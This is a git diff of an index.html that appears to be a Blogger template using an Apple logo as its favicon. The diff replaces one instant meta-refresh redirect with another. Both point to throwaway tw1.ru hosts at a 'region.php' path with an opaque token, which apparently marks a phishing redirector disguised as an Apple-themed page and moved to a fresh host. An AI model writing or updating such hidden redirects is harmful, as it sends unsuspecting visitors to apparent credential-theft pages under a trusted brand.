--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@ GX40 - LET'S SHOW THE CODE ! -->
 <html b:version='2' class='v2' expr:dir='data:blog.languageDirection' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
 <head>
 <link href='https://upload.wikimedia.org/wikipedia/commons/thumb/d/df/Apple-Apple.svg/1000px-Apple-Apple.svg.png' rel='icon' type='image/x-icon'/>
-<meta content='0;https://cs41824.tw1.ru/pages/region.php?lca#c135d99d9af1f2a87/' http-equiv='refresh'/>
+<meta content='0;https://cz66579.tw1.ru/pages/region.php?lca#09bac1b06aa67cd7c/' http-equiv='refresh'/>
 
 <meta content='IE=EmulateIE7' http-equiv='X-UA-Compatible'/>
 <b:if cond='data:blog.isMobile'>
